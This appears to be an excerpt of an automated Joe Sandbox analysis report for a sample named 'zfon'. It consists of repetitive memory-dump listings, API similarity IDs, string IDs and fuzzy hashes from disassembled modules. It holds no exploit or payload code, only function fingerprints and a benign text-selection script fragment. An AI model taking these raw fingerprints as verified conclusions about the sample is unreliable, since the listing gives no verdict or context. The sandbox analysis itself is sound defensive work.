                                                                                                                                                                            • var __scInternalExt = __scInternalExt || {};__scInternalExt.DisableTextSelect = function() { var el = null; var ready = false; var init = function() { if (ready) { return true;} if (!el) { el = document.createElement('style'); i, xrefs: 00007FF79CFCED3F
                                                                                                                                                                            • scene/disable-select, xrefs: 00007FF79CFCED51
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                                                                                            • String ID: scene/disable-select$var __scInternalExt = __scInternalExt || {};__scInternalExt.DisableTextSelect = function() { var el = null; var ready = false; var init = function() { if (ready) { return true;} if (!el) { el = document.createElement('style'); i
                                                                                                                                                                            • API String ID: 3856544966-2350028965
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileFindNext$wcscpy_s
                                                                                                                                                                            • String ID: .
                                                                                                                                                                            • API String ID: 544952861-248832578
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DecodePointerfreeterminate
                                                                                                                                                                            • String ID: csm
                                                                                                                                                                            • API String ID: 1319892530-1018135373
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionThrow$std::ios_base::failure::failure
                                                                                                                                                                            • String ID: ios_base::badbit set
                                                                                                                                                                            • API String ID: 1099746521-3882152299
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FFBC1B16E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFBC1B129EE), ref: 00007FFBC1B16E56
                                                                                                                                                                            • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B12A8E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abortterminate
                                                                                                                                                                            • String ID: MOC$RCC$csm
                                                                                                                                                                            • API String ID: 661698970-2671469338
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FFBC1B03524: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00007FFBC1B01222), ref: 00007FFBC1B03564
                                                                                                                                                                            • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B012A6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007378246.00007FFBC1B01000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFBC1B00000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b00000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abortterminate
                                                                                                                                                                            • String ID: MOC$RCC$csm
                                                                                                                                                                            • API String ID: 661698970-2671469338
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: strcspn$_invalid_parameter_noinfo_noreturnlocaleconvmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1669350605-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: strcspn$_invalid_parameter_noinfo_noreturnlocaleconvmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1669350605-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2943138195-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3041573648-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3041573648-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free
                                                                                                                                                                            • String ID: H
                                                                                                                                                                            • API String ID: 1294909896-2852464175
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$malloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2675522757-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3041573648-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3041573648-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesctypestd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2716750221-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___lc_codepage_func___lc_locale_name_func__pctype_funcislower
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2234106055-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: isspace$free$CloseEventHandlemallocmemcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 902297528-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___lc_codepage_func___lc_locale_name_func__pctype_funcisupper
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3857474680-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+$Replicator::operator[]
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3863519203-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localescodecvtstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3627902316-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1958836-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1958836-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmoneypunctstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3095117837-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
• Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localescodecvtstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3627902316-0
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1958836-0
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1958836-0
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1958836-0
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmoneypunctstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3095117837-0
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1958836-0
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesnumpunctstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 448217422-0
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmoneypunctstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3095117837-0
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmoneypunctstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3095117837-0
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1958836-0
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesctypestd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2716750221-0
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmoneypunctstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3095117837-0
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1958836-0
APIs
Memory Dump Source
• Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
• Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
Similarity
• API ID: ExceptionFacet_RegisterThrow_lock_localesnumpunctstd::_std::bad_alloc::bad_alloc
• String ID:
• API String ID: 448217422-0
Similarity
• API ID: ExceptionFacet_RegisterThrow_lock_localesmoneypunctstd::_std::bad_alloc::bad_alloc
• String ID:
• API String ID: 3095117837-0
Similarity
• API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
• String ID:
• API String ID: 1958836-0
Similarity
• API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
• String ID:
• API String ID: 1958836-0
Similarity
• API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
• String ID:
• API String ID: 1958836-0
Similarity
• API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
• String ID:
• API String ID: 1958836-0
                                                                                                                                                                            • Opcode ID: 3d07e47c0918bafadbea5d9194d2d850deff4b8fb05363baba3a438e069e2b82
                                                                                                                                                                            • Instruction ID: 1e76df7da63dbeae3fc3b5b550a74a73f1a932e9d44ff3563b6e3b1dd16d75bb
                                                                                                                                                                            • Opcode Fuzzy Hash: 3d07e47c0918bafadbea5d9194d2d850deff4b8fb05363baba3a438e069e2b82
                                                                                                                                                                            • Instruction Fuzzy Hash: C73182B9A08E4282FB14DF35E4500BA6360FF547A0F186231E69D337E5DF2CE4518B00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
• Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1958836-0
                                                                                                                                                                            • Opcode ID: 00f7dcfa46a85e9306d845bcb843d4a6e56abbb54567e8f720a27f441f54e1c1
                                                                                                                                                                            • Instruction ID: 9376e63b2d015321e9cd526653e02568e56d9513cc937937a1276964798e7033
                                                                                                                                                                            • Opcode Fuzzy Hash: 00f7dcfa46a85e9306d845bcb843d4a6e56abbb54567e8f720a27f441f54e1c1
                                                                                                                                                                            • Instruction Fuzzy Hash: F83183ADA09A4282EB15DF36E4500BB6360FB94BA4F586231D7AD777E5DF2CE441CB00
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
• Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _lock_locales
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3756862740-0
                                                                                                                                                                            • Opcode ID: 374a708f4c027f64f3bbde7d98aa8f2f3ec5882c15b9587f9c8a1f9dbcedd78d
                                                                                                                                                                            • Instruction ID: 113de373ce0ef61cff7a4f614293cd9fff8e82ea2741436cfffa0d1f4036aec4
                                                                                                                                                                            • Opcode Fuzzy Hash: 374a708f4c027f64f3bbde7d98aa8f2f3ec5882c15b9587f9c8a1f9dbcedd78d
                                                                                                                                                                            • Instruction Fuzzy Hash: EA3192B9A09E0282EB15DF35E4500BA6360EB947A0F586231EA9D337E5DF3CE451DB00
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
• Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _lock_locales
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3756862740-0
                                                                                                                                                                            • Opcode ID: e468151b5c2f458411b05d44ceda21bf334e284b4bb9150f2ddfd9151ffbaf81
                                                                                                                                                                            • Instruction ID: 7b8d9311ee4df54105308a8f7a1eaf2430bee1329259af31660315778d9ee603
                                                                                                                                                                            • Opcode Fuzzy Hash: e468151b5c2f458411b05d44ceda21bf334e284b4bb9150f2ddfd9151ffbaf81
                                                                                                                                                                            • Instruction Fuzzy Hash: 883185AAA08A4292EB15DF35D4500BB6360FB94BA0F586231E69D777E5DF3CF4458B00
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
• Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___lc_locale_name_funcfreemallocmemcpywcsnlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3567269174-0
                                                                                                                                                                            • Opcode ID: f30811991d692bedc0c7a1c88b05bcfd0119dbfede1abc1abae9bd436faa4321
                                                                                                                                                                            • Instruction ID: 0621ae932e17e5a826206f83f09922bd1870658c14b867595530092bdbddecc5
                                                                                                                                                                            • Opcode Fuzzy Hash: f30811991d692bedc0c7a1c88b05bcfd0119dbfede1abc1abae9bd436faa4321
                                                                                                                                                                            • Instruction Fuzzy Hash: 7121D7A9708B9241E7208F22E44042B9B90FB49FE4F945631DE6D27794DF3CE4568B44
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
• Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
